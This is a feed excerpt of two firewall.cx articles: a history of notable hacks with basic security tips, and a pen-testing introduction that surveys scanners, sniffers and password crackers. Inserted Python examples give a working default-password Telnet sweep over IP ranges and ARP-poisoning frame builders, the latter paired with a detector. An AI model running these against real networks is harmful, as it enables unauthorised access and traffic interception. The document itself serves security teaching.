<p style="text-align: justify;">March 10, 1997: It was a routine day of activity at Air Traffic Control (ATC) at Worcester, Massachusetts, with flight activity at its peak. Suddenly the ground to air communications system went down. This meant that ATC could not communicate with approaching aircraft trying to land. This was a serious threat to all aircraft and passengers using that airport. All incoming flights had to be diverted to another airport to avoid a disaster.</p>
<p style="text-align: justify;">This mayhem was caused by a 17-year-old hacker known as Jester. He had physically tapped into an ordinary telephone line, giving him complete control of the airport’s entire communications system. His intrusion was via a telephone junction box, which in turn was part of a high-end fibre backbone. He was caught when, directed by the United States Security Service, the telephone company traced the data streams back to his parents’ house. Jester was the first juvenile to be charged under the Computer Crimes Law.</p>
<p style="text-align: justify;">As our world becomes more and more computerised and our computer systems start interconnecting, the level of vulnerability goes up. But should this mean an end to all advancement in our lives? No. We need to make sure we are safe and the things that make our lives easier and safer are also secure.</p>
<h2>Intruder Alert</h2>
<p style="text-align: justify;"><strong>April 1994</strong>: A US Air Force base realised that its high-level security network had not just been hacked, but <img src="https://www.firewall.cx/images/stories/network-security-2.png" alt="network-security-2" width="200" height="180" style="margin: 7px; float: left;" />secure documents had been stolen. This resulted in an internal cyber manhunt. Bait was laid and all further intrusions were monitored. A team of 50 Federal Agents finally tracked down two hackers who were using US-based social networking systems to hack into the base. But it was later revealed that the scope of the intrusion was not limited to the base itself: they had infiltrated a much bigger military organisation. The perpetrators were hackers with the aliases ‘datastreamcowboy’ and ‘kuji’.</p>
<p style="text-align: justify;">‘Datastreamcowboy’ was a 16-year-old British national who was apprehended on May 4<sup>th</sup> 1994, and ‘kuji’ was a 21-year-old technician named Mathew Bevan from Cardiff, Wales. ‘datastreamcowboy’ was like an apprentice to ‘kuji’: he would try a method of intrusion and, if he failed, go back to ‘kuji’ for guidance. ‘kuji’ would mentor him to the point that on subsequent attempts ‘datastreamcowboy’ would succeed.</p>
<p style="text-align: justify;">What was their motive? Bragging rights in the world of hacking for being able to penetrate the security of the holy grail of all hackers: the Pentagon.</p>
<p style="text-align: justify;">But the future might not see such benign motives at play. As command and control of military installations is becoming computerised and networked, it has become imperative to safeguard against intruders who might break into an armoury with the purpose of causing damage to it or to control and use it with malice.</p>
<h2>Social Virus</h2>
<p style="text-align: justify;">October 2005: The social networking site MySpace was crippled by a highly infectious computer virus. The virus took control of millions of online MySpace profiles and broadcast the hacker’s messages. The hacker’s modus operandi was to place a virus on his own profile. Whenever someone visited his profile page, he/she would be infected and their profile would show the hacker’s profile message. These newly infected users would then spread the infection through their friends on MySpace, creating a massive chain reaction within the social network community. The mass infection caused the entire MySpace social network to grind to a halt.</p>
<p style="text-align: justify;">The creator of this mayhem was Samy Kamkar, a 19-year-old. But his attack was not very well organised: he left digital footprints and was later caught. Banned from using a computer for three years, he later became a security consultant helping companies and institutions safeguard themselves against attacks.</p>
<p style="text-align: justify;">What that showed the world was the fact that a cyber attack could come from anywhere, anytime.</p>
<p style="text-align: justify;">In our current digital world we already know that many of our complex systems, like Air Traffic Control, power stations, dams, etc., are controlled and monitored using computers and networks. Let’s try to understand the technology behind them to gauge where the security vulnerabilities come from.</p>
<h2>SCADA: Observer &amp; Controller</h2>
<p style="text-align: justify;">Over the last few decades, SCADA technology has enabled us to have greater control over predominantly mechanical systems which were, by design, very isolated. But what is SCADA? What does it stand for?</p>
<p style="text-align: justify;">SCADA is an acronym for <strong>S</strong>upervisory <strong>C</strong>ontrol <strong>A</strong>nd <strong>D</strong>ata <strong>A</strong>cquisition. A quick search on the internet and you would find the definition to be as follows:</p>
<p style="text-align: justify;"><strong>SCADA</strong> (<strong>supervisory control and data acquisition</strong>) is a type of industrial control system (ICS). Industrial control systems are computer controlled systems that monitor and control industrial processes that exist in the physical world. SCADA systems historically distinguish themselves from other ICS systems by being large scale processes that can include multiple sites and large distances. These processes include industrial, infrastructure, and facility-based processes as described below:</p>
<ul style="text-align: justify;">
<li>Industrial processes include those of manufacturing, production, power generation, fabrication and refining, and may run in continuous, batch, repetitive, or discrete modes.</li>
<li>Infrastructure processes may be public or private and include water treatment and distribution, wastewater collection and treatment, oil and gas pipelines, electrical power transmission and distribution, wind farms, civil defence siren systems and large communication systems.</li>
<li>Facility processes occur both in public facilities and private ones, including buildings, airports, ships, and space stations. They monitor and control heating, ventilation and air conditioning systems (HVAC), access and energy consumption.</li>
</ul>
<p style="text-align: justify;">This effectively lets us control the landing lights on a runway, the gates of a reservoir or a dam, or the connection and disconnection of power grids to a city supply.</p>
<p style="text-align: justify;">Over the last decade all such systems have become connected to the internet. However, when SCADA was being developed no thought was given to security: no one imagined that a SCADA based system would end up on the internet. Functionality and convenience were given higher priority and security was ignored, hence SCADA carries the burden of inherent security flaws.</p>
<p style="text-align: justify;">Tests have been performed extensively to map the vulnerabilities of a networked SCADA system. A test was done on a federal prison which used SCADA to control gates and security infrastructure. Within two weeks, a test hacker had full control of all the cell doors. The kit the hacker used was purchased from the open market for a value as low as $2500.</p>
<p style="text-align: justify;">But, thankfully, more thought is given today when designing a SCADA based system that will be used over a network. Strict security policies and intrusion detection and prevention technologies are implemented.</p>
<h2>Where’s My Money?</h2>
<p style="text-align: justify;">The years <strong>1994 – 1995</strong> saw a momentous change in our financial industry: the entire financial sector was now online. Paper transactions were a thing of the past. Vast sums of money now change location in a matter of milliseconds. The share markets, along with complex monetary assets, now trade using the same cyber space which we use for social networking, shopping and so on. As this involved money being transferred in unimaginable amounts, the financial industry, and especially banks, went to great lengths to protect themselves.</p>
<p style="text-align: justify;">As happens in our physical world, where thieves change their ways to adapt to better locks, hackers have developed tools that can bypass encryption to steal funds, or even hold an entire institution to ransom. The average annual loss due to cyber heists has been estimated at nearly 1.3 million dollars. Since banks hardly hold any cash in their branches, an ordinary bank robbery would hardly amount to $6000 – $8000 in hard cash.</p>
<p style="text-align: justify;">Cyber heists are a criminal industry with staggering rewards: the magnitude is in the hundreds of billions of dollars. But most cyber intrusions in this industry go unreported because of their long-term impact on the compromised institution’s reputation and credibility.</p>
<h2>Your Card Is Now My Card!</h2>
<p style="text-align: justify;"><img src="https://www.firewall.cx/images/stories/network-security-3.jpg" alt="network-security-credit-card-hacked" width="250" height="188" style="margin: 7px; float: left;" /><strong>2005</strong>: Miami, Florida. A Miami hacker made history in cyber theft. Albert Gonzalez would drive around the streets of Miami looking for unsecured wireless networks. He hooked onto the unsecured wireless network of a retailer, used it to reach the retailer’s headquarters and stole credit card numbers from its databases. He then sold these card details to Eastern European cyber criminals. In the first year, he stole 11.2 million card details. By the end of the second year he had stolen about 90 million card details.</p>
<p style="text-align: justify;">He was arrested in July 2007 while trying to use one of these stolen cards. On subsequent interrogation it was revealed that he had stored away 43 million credit card details on servers in Latvia and Ukraine.</p>
<p style="text-align: justify;">In recent times we know a certain gaming console organisation had its online gaming network hacked and customer details stolen. For that organisation, the security measures taken subsequent to that intrusion were ‘too little too late’, but all such companies that hold customer credit card details consequently improved their network security setup.</p>
<h2>Meltdown By Swatting</h2>
<p style="text-align: justify;">January 2005: A hacker with the alias ‘dshocker’ was carrying out an all-out attack on several big corporations in the US. He used stolen credit cards to fund his hacking activities. He managed to break through a firewall and infect large numbers of computers. This enabled him to take control of all of those machines and use their collective computing power to carry out a Denial of Service attack on the corporation itself. The entire network went into a meltdown. Then he did something that is known today as ‘swatting’. Swatting is an action that dupes the emergency services into sending out an emergency response team. This false alarm and the follow-up raids would end up costing the civic authorities vast sums of money and resources.</p>
<p style="text-align: justify;">He was finally arrested when his fraudulent credit card activities caught up with him.</p>
<h2>Playing Safe In Today’s World</h2>
<p style="text-align: justify;">Today technology is a great equaliser. It has given the sort of power to individuals that only nations could boast of in the past. All the network intrusions and their subsequent effects can be used individually or together to bring a nation to its knees. The attackers can hide behind the cyber world and their attacks can strike anyone without warning. So what we need to do is to stay a step ahead.</p>
<p style="text-align: justify;">We can’t abolish using the network, the cloud or the things that have given us more productivity and efficiency. We need to envelop ourselves with stricter security measures to ensure that all that belongs to us is safe, and amenities used by us everyday are not turned against us. This goes for everyone, big organisations and the individual using his home network.</p>
<p style="text-align: justify;">At home, keep your wireless internet connection locked down with a proper password. Do not leave any default passwords unchanged; that is a security flaw that can be taken advantage of. On your PCs and desktops, every operating system comes with its own firewall. Keep it on. Turning it off for convenience will cost you more than keeping it on and allowing only certain applications to communicate safely with the internet. In your emails, if you don’t recognise a sender’s address, do not respond or click on any of the links it may carry. These can be viruses ready to attack your machines and create a security hole through which the hacker will enter your home network. And for cyber’s sake, please, you haven’t won a lottery or inherited millions from a dead relative. So all those emails telling you so are just fakes. They are only worth deleting.</p>
<p style="text-align: justify;">The simple exercise of keeping your pop-up blocker turned on will make your surfing through your browser a lot safer. Your operating system, mainly Windows and Linux, lets you keep a guest account, so whenever a ‘guest’ wants to check his/her emails or surf the web have them use this account instead of your own. Not that you don’t trust your guest, but they might innocently click on something while surfing and not know what cyber nastiness they have invited into your machine. The guest account has minimal privileges, so it is safer to use. Also, all accounts must have proper passwords. Don’t let your machine boot up to an administrator account with no password set. That is a recipe for disaster. Don’t use a café’s wireless network to check your bank balance. That can wait till you reach home. Or just call the bank up. That’s safer.</p>
<p style="text-align: justify;">At work, please don’t plug an unauthorised wireless access point into your corporate network; this can severely compromise it. Use strong passwords for accounts and remove old accounts that are no longer used. Incorporate strong firewall rules and demarcate an effective DMZ so that you stay safer. Stop trying to find a way to jump over a proxy, or disable it. You are using company time for a purpose that can’t be work related. If it is needed, ask the network administrator for assistance.</p>
<p style="text-align: justify;">I am not an alarmist, nor do I believe in sensationalism. I believe in staying safe so that I can enjoy the fruits of technology. And so should you, because you deserve it.</p>
<p style="text-align: justify;">Readers can also visit our <a href="https://www.firewall.cx/tools-tips-reviews/security-articles.html" target="_blank" title="Network Security section">Network Security section</a> which offers a number of interesting articles covering Network Security.</p>
<h4 class="About-Writer">About the Writer</h4>
<p>Arani Mukherjee holds a Master’s degree in Distributed Computing Systems from the University of Greenwich, UK and works as a network designer and innovator for remote management systems for a major telecoms company in the UK. He is an avid reader of anything related to networking and computing. Arani is a highly valued and respected member of Firewall.cx, offering knowledge and expertise to the global community since 2005.</p>]]></description>
			<category>Security Articles</category>
			<pubDate>Wed, 29 May 2013 08:30:00 +1000</pubDate>
		</item>
		<item>
			<title>Introduction To Network Security - Part 2</title>
			<link>https://www.firewall.cx/tools-tips-reviews/security-articles/network-security-intro-p2.html</link>
			<guid isPermaLink="true">https://www.firewall.cx/tools-tips-reviews/security-articles/network-security-intro-p2.html</guid>
			<description><![CDATA[<p style="text-align: justify;">This article builds upon our first article, <a href="https://www.firewall.cx/tools-tips-reviews/security-articles/network-security-intro.html" target="_blank" title="Introduction to Network Security - Part 1">Introduction to Network Security - Part 1</a>. This article is split into 5 pages and covers a variety of topics, including:</p>
<ul>
<li>Tools an Attacker Uses</li>
<li>General Network Tools</li>
<li>Exploits</li>
<li>Port Scanners</li>
<li>Network Sniffers</li>
<li>Vulnerability Scanners</li>
<li>Password Crackers</li>
<li>What is Penetration Testing</li>
<li>More Tools</li>
<li>Common Exploits</li>
<li>A Brief Walk-through of an Attack</li>
<li>and more.</li>
</ul>
<h2>Tools An Attacker Uses</h2>
<p style="text-align: justify;">Now that we've concluded a brief introduction to the types of threats faced by both home users and the enterprise, it is time to have a look at some of the tools that attackers use.</p>
<p style="text-align: justify;">Keep in mind that a lot of these tools have legitimate purposes and are very useful to administrators as well. For example, I can use a network sniffer to diagnose a low-level network problem, or I can use it to collect your password. It just depends which shade of hat I choose to wear.</p>
<h2 style="text-align: justify;">General Network Tools</h2>
<p style="text-align: justify;">As surprising as it might sound, some of the most powerful tools, especially in the beginning stages of an attack, are the regular network tools available with most operating systems. For example, an attacker will usually query the 'whois' databases for information on the target. After that he might use 'nslookup' to see if he can transfer the whole contents of their DNS zone (called a zone transfer -- big surprise !!). This will let him identify high profile targets such as web servers, mail servers, DNS servers etc. He might also be able to figure out what different systems do based on their DNS name -- for example sqlserver.victim.com would most likely be a database server. Other important tools include traceroute to map the network and ping to check which hosts are alive. You should make sure your firewall blocks ping requests and traceroute packets.</p>
<h2>Exploits</h2>
<p style="text-align: justify;">An exploit is a generic term for the code that actually 'exploits' a vulnerability in a system. The exploit can be a script that causes the target machine to crash in a controlled manner (e.g. a buffer overflow) or it could be a program that takes advantage of a misconfiguration.</p>
<p style="text-align: justify;">A 0-day exploit is an exploit that is unknown to the security community as a whole. Since most vulnerabilities are patched within 24 hours, 0-day exploits are the ones for which the vendor has not yet released a patch. Attackers keep large collections of exploits for different systems and different services, so when they attack a network, they find a host running a vulnerable version of some service and then use the relevant exploit.</p>
<h2 style="text-align: justify;">Port Scanners</h2>
<p style="text-align: justify;">Most of you will know what port scanners are. Any system that offers TCP or UDP services will have an open port for that service. For example, if you're serving up web pages, you'll likely have TCP port 80 open; FTP is TCP port 20/21, Telnet is TCP 23, SNMP is UDP port 161 and so on.</p>
<p style="text-align: justify;">A port scanner scans a host or a range of hosts to determine which ports are open and what service is running on them. This tells the attacker which systems can be attacked.<br />For example, if I scan a web server and find that port 80 is running an old web server -- IIS/4.0 -- I can target this system with my collection of exploits for IIS 4. Usually the port scanning will be conducted at the start of the attack, to determine which hosts are interesting.</p>
<p style="text-align: justify;">This is when the attacker is still footprinting the network -- feeling his way around to get an idea of what type of services are offered, what operating systems are in use and so on. One of the best port scanners around is Nmap (https://www.insecure.org/nmap). Nmap runs on just about every operating system, is very versatile in how it lets you scan a system and has many features, including OS fingerprinting, service version scanning and stealth scanning. Another popular scanner is Superscan (https://www.foundstone.com), which is only for the Windows platform.</p>
<h2 style="text-align: justify;">Network Sniffers</h2>
<p style="text-align: justify;">A network sniffer puts the computer's NIC (network interface card or LAN card) into 'promiscuous mode'. In this mode, the NIC picks up all the traffic on its subnet regardless of whether it was meant for it or not. Attackers set up sniffers so that they can capture all the network traffic and pull out logins and passwords. The most popular network sniffer is tcpdump, as it can be run from the command line -- which is usually the level of access a remote attacker will get. Other popular sniffers are Iris and Ethereal.</p>
<p style="text-align: justify;">When the target network is a switched environment (a network which uses layer 2 switches), a conventional network sniffer will not be of any use. For such cases, the switched-network sniffer Ettercap (http://ettercap.sourceforge.net) and Wireshark (https://www.wireshark.org) are very popular. Such programs are usually run with other hacking-capable applications that allow the attacker to collect passwords, hijack sessions, modify ongoing connections and kill connections. Such programs can even sniff secured communications like SSL (used for secure web pages) and SSH1 (Secure Shell - a remote access service like telnet, but encrypted).</p>
<h2 style="text-align: justify;">Vulnerability Scanners</h2>
<p style="text-align: justify;">A vulnerability scanner is like a port scanner on steroids: once it has identified which services are running, it checks the system against a large database of known vulnerabilities and then prepares a report on what security holes were found. The software can be updated to scan for the latest security holes. Unfortunately, these tools are very simple to use, so many script kiddies simply point them at a target machine to find out what they can attack. The most popular ones are Retina (http://www.eeye.com), Nessus (http://www.nessus.org) and GFI LanScan (http://www.gfi.com). These are very useful tools for admins as well, as they can scan their whole network and get a detailed summary of what holes exist.</p>
<h2 style="text-align: justify;">Password Crackers</h2>
<p style="text-align: justify;">Once an attacker has gained some level of access, he/she usually goes after the password file on the relevant machine. In UNIX-like systems this is the /etc/passwd or /etc/shadow file, and in Windows it is the SAM database. Once he gets hold of this file, it's usually game over: he runs it through a password cracker that will usually guarantee him further access. Running a password cracker against your own password files can be a scary and enlightening experience. L0phtcrack cracked my old password fR7x!5kK after being left on for just one night!</p>
<p style="text-align: justify;">There are essentially two methods of password cracking:</p>
<p style="text-align: justify;"><strong>Dictionary Mode</strong> - In this mode, the attacker feeds the cracker a word list of common passwords such as 'abc123' or 'password'. The cracker will try each of these passwords and note where it gets a match. This mode is useful when the attacker knows something about the target. Say I know that the passwords for the servers in your business are the names of Greek gods (yes Chris, that's a shout-out to you ;)). I can find a dictionary list of Greek god names and run it through the password cracker.</p>
<p style="text-align: justify;">Most attackers have a large collection of wordlists. For example, when I do penetration testing work, I usually use common password lists, Indian name lists and a couple of customised lists based on what I know about the company (usually data I pick up from their company website). Many people think that adding a couple of numbers at the start or end of a password (for example 'superman99') makes the password very difficult to crack. This is a myth, as most password crackers have the option of adding numbers to the end of words from the wordlist. While it may take the attacker 30 minutes more to crack your password, it does not make it much more secure.</p>
<p style="text-align: justify;"><strong>Brute Force Mode</strong> - In this mode, the password cracker will try every possible combination for the password. In other words, it will try aaaaa, aaaab, aaaac, aaaad and so on. This method will crack every possible password; it's just a matter of how long it takes. It can turn up surprising results because of the power of modern computers. A 5-6 character alphanumeric password is crackable within a matter of a few hours or maybe a few days, depending on the speed of the software and machine. Powerful crackers include <strong>L0phtcrack</strong> for Windows passwords and <strong>John the Ripper</strong> for UNIX-style passwords.</p>
<p style="text-align: justify;">For each category, I have listed one or two tools as an example. At the end of this article I will present a more detailed list of tools with descriptions and possible uses.</p>
<hr class="system-pagebreak" title="2. Penetration-Testing" />
<h2 style="text-align: justify;">What is Penetration-Testing?</h2>
<p style="text-align: justify;">Penetration testing is basically when you hire security consultants (or do it yourself) to attack your network the way an attacker would, and report the results to you, enumerating what holes were found and how to fix them. It's basically breaking into your own network to see how others would do it.</p>
<p style="text-align: justify;">While many admins like to run quick probes and port scans on their systems, this is not a penetration test -- a penetration tester will use a variety of specialised methods and tools from the underground to attempt to gain access to the network. Depending on what level of testing you have asked for, the tester may even go so far as to call up employees and try to social engineer their passwords out of them (social engineering involves fooling a mark into revealing information they should not reveal).</p>
<p style="text-align: justify;">An example of social engineering could be an attacker pretending to be someone from the IT department and asking a user to reset his password. Penetration testing is probably the only honest way to figure out what security problems your network faces. It can be done by an administrator who is security aware, but it is usually better to pay an outside consultant who will do a more thorough job.</p>
<p style="text-align: justify;">I find there's a lack of worthwhile information online about penetration testing -- nobody really describes a good pen test, and what you should and shouldn't do. So I've hand-picked a couple of good papers on the subject and then given you a list of my favourite tools, and the way I like to do things in a pen test.</p>
<p style="text-align: justify;">This is by no means the only way to do things; it's like subnetting -- everyone has their own method. This is just a systematic approach that works very well as a set of guidelines. Depending on how much information you are given about the targets, as well as what level of testing you're allowed to do, this method can be adapted.</p>
<h2 style="text-align: justify;">Papers Covering Penetration Testing</h2>
<p>I consider the following works essential reading for anyone who is interested in performing pen-tests, whether for yourself or if you're planning a career in security:</p>
<p>'Penetration Testing Methodology - For Fun And Profit' - Efrain Tores and LoNoise, you can google for this paper and find it.</p>
<p>'An Approach To Systematic Network Auditing' - Mixter (http://mixter.void.ru)</p>
<p>'Penetration Testing - The Third Party Hacker' - Jessica Lowery. Boy is this ever a good paper ! (https://www.sans.org/rr/papers/index.php?id=264)</p>
<p>'Penetration Testing - Technical Overview' - Timothy P. Layton Sr. also from the www.sans.org (https://www.sans.org) reading room</p>
<h2>Pen-test Setup</h2>
<p style="text-align: justify;">I don't like working from laptops unless it's absolutely imperative, like when you have to do a test from the inside. For the external tests I use a Windows XP machine with Cygwin (www.cygwin.com) and VMware (www.vmware.com). Most Linux exploits compile fine under Cygwin; if they don't, I shove them into VMware, where I have virtual machines of Red Hat, Mandrake and Win2k boxes. In case that doesn't work, the system also dual boots Red Hat 9, and often I'll just work everything out from there.</p>
<p style="text-align: justify;">I feel the advantage of using a Microsoft platform often comes from the fact that 90% of your targets may be Microsoft systems. However, the flexibility under Linux is incomparable; it is truly the OS of choice for any serious hacker, and as a result for any serious security professional. There is no best OS for penetration testing -- it depends on what you need to test at a point in time. That's one of the main reasons for having so many different operating systems set up, because you're very likely to be switching between them for different tasks.</p>
<p style="text-align: justify;">If I don't have the option of using my own machine, I like to choose any Linux variant.<br /> I keep my pen tests strictly to the network level; there is no social engineering involved or any real physical access testing other than basic server room security and workstation lockdown (I don't go diving in dumpsters for passwords or scamming employees).</p>
<p style="text-align: justify;">I try as far as possible to determine the Rules of Engagement with an admin or some other technically adept person with the right authorisation, not a corporate type. This is very important, because if you do something that ends up causing trouble on the network, it's going to make you look very unprofessional. It's always better to have it clearly in writing -- this is what you are allowed to do.</p>
<p style="text-align: justify;">I would recommend this even if you're an admin conducting an in-house test. You can get fired just for scanning your own network if it's against your corporate policy. If you're an outside tester, offer to allow one of their people to be present during your testing if they want. This is recommended, as they will ultimately be fixing most of these problems, and being in-house people they will be able to put the results of the test in perspective for the managers.</p>
<h2>Tools</h2>
<p style="text-align: justify;">I start by visiting the target website, running a whois, DNS zone transfer (if possible) and other regular techniques which are used to gather as much network and generic information about the target. I also like to pick up names and email addresses of important people in the company -- the CEO, technical contacts etc. You can even run a search in the newsgroups for @victim.com to see all the public news postings they have made. This is useful as a lot of admins frequent bulletin boards for help. All this information goes into a textfile. Keeping notes is critically important, it's very easy to forget some minor detail that you should include in your end report.</p>
<p style="text-align: justify;">Now for a part of the arsenal -- not in any order and far from the complete list.</p>
<p style="text-align: justify;"><strong>Nmap </strong>- My (and everyone else's) workhorse port scanner, with version scanning, multiple scan types, OS fingerprinting and firewall evasion tricks. Used carefully, Nmap will find just about any Internet-facing host on a network, including ones that don't answer a plain ping sweep.</p>
<p style="text-align: justify;"><strong>Nessus </strong>- My favourite free vulnerability scanner; it usually finds something on every host. It's not too stealthy though, and will show up in logs (this is something I don't have to worry about too much). (Nessus has since gone closed-source; OpenVAS, forked from the last GPL release, is the free alternative.)</p>
<p style="text-align: justify;"><strong>Retina </strong>- A very good commercial vulnerability scanner. I stopped using this after I started with Nessus, but it's very quick and good, and its vulnerability database is very up-to-date.</p>
<p style="text-align: justify;"><strong>Nikto </strong>- This is a web server vulnerability scanner. I use my own hacked-up version of this Perl program, which uses the libwhisker module. It has quite a few IDS evasion modes and is pretty fast. It is not that subtle though, which is why I modified it to be a bit more stealthy.</p>
<p style="text-align: justify;"><strong>Cisco Scanner</strong> - This is a small Windows utility I found that scans IP ranges for routers with the default password of 'cisco'. It has turned up some surprising results in the past, and just goes to show how even small tools can be very useful. I am planning to write a little script that will scan IP ranges looking for different types of equipment with default passwords.</p>
<p style="text-align: justify;"><strong>Sophie Script</strong> - A little Perl script coupled with user2sid and sid2user (two Windows programs) which can find all the usernames on a Windows machine: it resolves the machine's SID and then walks through the RIDs (500, 501, 1000, 1001 and so on), asking for the account name behind each one.</p>
<p style="text-align: justify;"><strong>Legion</strong> - This is a Windows file share scanner by the erstwhile Rhino9 security group. It is fast as hell and lets you map the drive right from within the software.</p>
<p style="text-align: justify;"><strong>Pwdump2</strong> - Dumps the password hashes from the Windows SAM database for loading into a password cracker.</p>
<p style="text-align: justify;"><strong>L0phtcrack 3.0</strong> - Cracks the hashes I get from the above or from its own internal SAM dump. It can also sniff the network for password hashes or obtain them via the remote registry. I have not tried the latest version of the software, but it is very highly rated.</p>
<p style="text-align: justify;"><strong>Netcat</strong> - This is a TCP/UDP connection backend tool -- oh boy, I am lost without this! Half my scripts rely on it. There is also an encrypted version called cryptcat, which might be useful if you are walking around an IDS. Netcat can do just about anything with a TCP or UDP connection, and it serves as my replacement for telnet as well.</p>
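<p style="text-align: justify;">The sort of script the Cisco Scanner entry is talking about, as an added example that is not the article's own tool: it walks an address range, speaks just enough of a Telnet-style login to offer each default password, and records which hosts let it in. It assumes the service prints a 'Password:' prompt and answers a correct password with a '&gt;' or '#' exec prompt (as a Cisco IOS vty line does); real devices also send Telnet option negotiation, which this minimal client ignores. The mock router at the bottom is constructed so the sweep can be run offline; point it at real equipment only with the written authorisation discussed above.</p>

```python
"""Default-password sweep over an IP range. Added example, not the
article's script. Assumes a 'Password:' prompt and a '>'/'#' prompt on
success; the mock router below is constructed for offline runs."""
import ipaddress
import socket
import socketserver
import threading

# Constructed list of vendor defaults; one attempt per entry per host.
DEFAULT_PASSWORDS = ["cisco", "admin", "password"]


def _read_until(sock, markers, limit=4096):
    """Read until any marker appears, the peer closes, or `limit` bytes."""
    buf = b""
    while not any(m in buf for m in markers) and len(buf) < limit:
        chunk = sock.recv(256)
        if not chunk:
            break
        buf += chunk
    return buf


def try_password(host, port, password, timeout=3.0):
    """True if `password` alone yields an exec prompt on host:port."""
    try:
        with socket.create_connection((host, port), timeout=timeout) as s:
            s.settimeout(timeout)
            if b"Password:" not in _read_until(s, (b"Password:",)):
                return False               # not a password-only login
            s.sendall(password.encode() + b"\r\n")
            reply = _read_until(s, (b">", b"#", b"Password:"))
    except OSError:                        # refused, reset or timed out
        return False
    # A re-prompt means rejection; an exec prompt means we are in.
    return b"Password:" not in reply and (b">" in reply or b"#" in reply)


def sweep(network, port=23, passwords=DEFAULT_PASSWORDS):
    """Try the defaults against every address in `network` (CIDR string).
    Returns {address: password} for the hosts that accepted one."""
    net = ipaddress.ip_network(network, strict=False)
    targets = list(net) if net.num_addresses <= 2 else list(net.hosts())
    hits = {}
    for ip in targets:
        for pw in passwords:
            if try_password(str(ip), port, pw):
                hits[str(ip)] = pw
                break
    return hits


class _MockRouter(socketserver.BaseRequestHandler):
    """Constructed stand-in for a router whose vty password is 'cisco'."""

    def handle(self):
        self.request.sendall(b"\r\nUser Access Verification\r\n\r\nPassword: ")
        line = _read_until(self.request, (b"\n",)).strip()
        if line == b"cisco":
            self.request.sendall(b"\r\nRouter>")
        else:
            self.request.sendall(b"\r\n% Bad passwords\r\n")


def start_mock_router():
    """Serve the mock on 127.0.0.1 at an ephemeral port; returns (server, port)."""
    server = socketserver.ThreadingTCPServer(("127.0.0.1", 0), _MockRouter)
    threading.Thread(target=server.serve_forever, daemon=True).start()
    return server, server.server_address[1]


if __name__ == "__main__":
    srv, p = start_mock_router()
    print(sweep("127.0.0.1/32", port=p))    # {'127.0.0.1': 'cisco'}
    srv.shutdown()
```

<p style="text-align: justify;">Each password attempt is a fresh TCP connection, so every try lands in the device's logs; that is fine for an authorised test but worth remembering when you read the results alongside the target's own syslog. Extending the script to other equipment is a matter of adding prompt/response pairs per vendor rather than changing the sweep loop.</p>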
<p style="text-align: justify;"><strong>Hping2</strong> - A custom packet creation utility, great for testing firewall rules among other things.</p>
<p style="text-align: justify;"><strong>SuperScan</strong> - This is a Windows-based port scanner with a lot of nice options. It's fast, and has a lot of other neat little tools like NetBIOS enumeration and common utilities such as whois, zone transfers etc.</p>
<p style="text-align: justify;"><strong>Ettercap</strong> - On a switched network a conventional sniffer only sees traffic to and from its own port, so it will not work. Ettercap poisons the ARP cache of the hosts you want to sniff so that they send their packets to you, where you can read them before forwarding them on. It also allows you to inject data into connections and kill connections, among other things.</p>
<p style="text-align: justify;"><strong>Brutus</strong> - This is a fairly generic protocol brute-forcing tool. It can brute-force HTTP, FTP, Telnet and many other login authentication systems. This is a Windows tool; I prefer Hydra on Linux.</p>
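<p style="text-align: justify;">What ARP cache poisoning actually puts on the wire, and the check a defender can run over captured ARP traffic, as an added example; this is not code from the article or from Ettercap, and every address and frame in it is constructed. The poisoner repeats two unsolicited ARP replies: one telling the victim that the gateway's IP lives at the attacker's MAC, one telling the gateway the same about the victim, so both directions of the conversation pass through the attacker. The watcher below is the arpwatch idea: remember each IP-to-MAC binding and report any reply that contradicts one.</p>

```python
"""ARP poisoning frames and an arpwatch-style detector. Added example,
not the article's or Ettercap's code; addresses are constructed."""
import struct

ETH_P_ARP = 0x0806          # EtherType for ARP
ARP_REPLY = 2


def _mac(s):
    return bytes.fromhex(s.replace(":", ""))


def _ip(s):
    return bytes(int(o) for o in s.split("."))


def build_arp_reply(sender_mac, sender_ip, target_mac, target_ip):
    """Ethernet frame carrying an ARP reply: 'sender_ip is at sender_mac'.
    A poisoner sends this unsolicited, with its own NIC as sender_mac."""
    eth = _mac(target_mac) + _mac(sender_mac) + struct.pack("!H", ETH_P_ARP)
    arp = (struct.pack("!HHBBH", 1, 0x0800, 6, 4, ARP_REPLY)
           + _mac(sender_mac) + _ip(sender_ip)
           + _mac(target_mac) + _ip(target_ip))
    return eth + arp


def parse_arp(frame):
    """Return (opcode, sender_mac, sender_ip) for an Ethernet/IPv4 ARP
    frame, or None for anything else."""
    if len(frame) < 42 or struct.unpack("!H", frame[12:14])[0] != ETH_P_ARP:
        return None
    htype, ptype, hlen, plen, op = struct.unpack("!HHBBH", frame[14:22])
    if (htype, ptype, hlen, plen) != (1, 0x0800, 6, 4):
        return None
    sender_mac = ":".join("%02x" % b for b in frame[22:28])
    sender_ip = ".".join(str(b) for b in frame[28:32])
    return op, sender_mac, sender_ip


class ArpWatch:
    """IP-to-MAC table fed from ARP replies. A reply that contradicts a
    known binding is reported and the old binding is kept. Seed it with
    the static bindings you care about (gateway, servers) so the first
    poisoning frame cannot simply be 'learned' as the truth."""

    def __init__(self, static=None):
        self.table = dict(static or {})
        self.alerts = []

    def feed(self, frame):
        parsed = parse_arp(frame)
        if parsed is None or parsed[0] != ARP_REPLY:
            return None
        _, mac, ip = parsed
        known = self.table.get(ip)
        if known is not None and known != mac:
            alert = (ip, known, mac)       # (ip, trusted mac, claimed mac)
            self.alerts.append(alert)
            return alert
        self.table.setdefault(ip, mac)     # first sighting: learn it
        return None


# Constructed lab: a gateway, a victim and the attacker's NIC.
GATEWAY_IP, GATEWAY_MAC = "10.0.0.1", "00:11:22:33:44:01"
VICTIM_IP, VICTIM_MAC = "10.0.0.50", "00:11:22:33:44:50"
ATTACKER_MAC = "de:ad:be:ef:00:01"


def poison_frames():
    """The pair a man-in-the-middle poisoner repeats every few seconds."""
    return [build_arp_reply(ATTACKER_MAC, GATEWAY_IP, VICTIM_MAC, VICTIM_IP),
            build_arp_reply(ATTACKER_MAC, VICTIM_IP, GATEWAY_MAC, GATEWAY_IP)]


def demo():
    """One legitimate gateway reply, then the poison pair, fed to a watcher
    seeded with the gateway binding only; returns the per-frame verdicts."""
    watch = ArpWatch({GATEWAY_IP: GATEWAY_MAC})
    legit = build_arp_reply(GATEWAY_MAC, GATEWAY_IP, VICTIM_MAC, VICTIM_IP)
    return [watch.feed(f) for f in [legit] + poison_frames()]
```

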